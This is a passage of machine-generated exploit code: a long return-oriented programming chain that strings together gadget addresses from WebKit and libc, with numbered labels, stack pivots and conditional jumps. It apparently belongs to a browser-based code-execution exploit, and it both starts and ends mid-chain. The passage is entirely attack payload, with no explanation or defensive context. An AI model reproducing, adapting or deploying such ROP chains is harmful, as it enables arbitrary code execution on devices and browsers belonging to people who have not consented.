libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+244280, //L4432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244296, //L4433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4432:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4433:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+244472, //L4435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244488, //L4436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+244456, //L4434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4434:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4435:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4436:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+244632, //L4439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244648, //L4440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+244600, //L4437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4437:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4438:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4439:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4440:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+244720, //L4441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4441:
db([0, 0]); // 0x0
//L4413:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+244848, //L4444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244864, //L4445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+244832, //L4443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4443:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4444:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4445:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+244976, //L4447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+245024, //L4450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+244992, //L4448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4447:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4448:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4449:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4450:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+245136, //L4451+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+245128, //L4451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4451:
db([0, 0]); // 0x0
set_gadgets([
ropchain+245152, //L4451+24
ropchain+247176, //L4446
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+245192, //L4452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4452:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4453:
db([120, 0]); // 0x78
set_gadget(libc_base+144605,); //pop rdi
//L4454:
db([120, 0]); // 0x78
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+245384, //L4458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+245352, //L4456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+245368, //L4457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4455:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4456:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4457:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4458:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+245440, //L4460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4460:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+245568, //L4462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+245584, //L4463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+245552, //L4461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4461:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4462:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4463:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+245680, //L4465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+245664, //L4464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4464:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4465:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+245760, //L4466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4466:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4468:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+245880, //L4471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+245864, //L4469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4469:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4471:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+246024, //L4474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+245992, //L4472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+246008, //L4473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4472:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4473:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4474:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+246096, //L4476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4476:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+246152, //L4477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4477:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+246232, //L4479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4479:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4481:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+246352, //L4484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+246336, //L4482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4482:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4484:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+246496, //L4487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+246464, //L4485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+246480, //L4486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4485:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4486:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4487:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+246584, //L4489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4488:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4489:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+246640, //L4490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4490:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4492:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+246720, //L4494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4494:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+246824, //L4495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+246840, //L4496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4495:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4496:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+246928, //L4498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4498:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+246984, //L4499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4499:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+247056, //L4502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4502:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+247112, //L4503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4503:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+258080, //L4505
//L4446:
libc_base+764760, //pop rsi
ropchain+247216, //L4506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4506:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4508:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+247336, //L4511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+247320, //L4509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4509:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4511:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+247512, //L4514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+247528, //L4515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+247480, //L4512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+247496, //L4513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4512:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4513:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4514:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4515:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+247688, //L4519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+247656, //L4517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+247672, //L4518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4516:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4517:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4518:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4519:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+247792, //L4521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+247776, //L4520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4520:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4521:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+247888, //L4523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4522:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4523:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4524:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+247992, //L4525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248008, //L4526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4525:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4526:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+248176, //L4528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248192, //L4529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+248160, //L4527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4527:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4528:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4529:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+248352, //L4534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248368, //L4535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+248304, //L4531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4531:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4532:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4533:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4534:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4535:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+248480, //L4536+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+248472, //L4536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4536:
db([0, 0]); // 0x0
set_gadgets([
ropchain+248496, //L4536+24
ropchain+249536, //L4530
libc_base+764760, //pop rsi
ropchain+248536, //L4537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4537:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4539:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+248656, //L4542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+248640, //L4540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4540:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4542:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+248832, //L4545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248848, //L4546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+248800, //L4543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+248816, //L4544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4543:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4544:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4545:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4546:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+248944, //L4548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+248928, //L4547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4547:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4548:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4549:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4550:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L4551:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+249144, //L4553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4553:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+249200, //L4554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4554:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+249336, //L4558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+249320, //L4557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4556:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4557:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4558:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+249424, //L4559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+249456, //L4561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4559:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4560:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4561:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+249528, //L4562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4562:
db([0, 0]); // 0x0
//L4530:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+249656, //L4565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+249672, //L4566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+249640, //L4564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4564:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4565:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4566:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+249832, //L4571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+249848, //L4572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+249784, //L4568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4568:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4569:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4570:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4571:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4572:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+249960, //L4573+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+249952, //L4573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4573:
db([0, 0]); // 0x0
set_gadgets([
ropchain+249976, //L4573+24
ropchain+250928, //L4567
libc_base+764760, //pop rsi
ropchain+250016, //L4574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4574:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4576:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+250136, //L4579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+250120, //L4577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4577:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4579:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+250280, //L4582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+250248, //L4580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
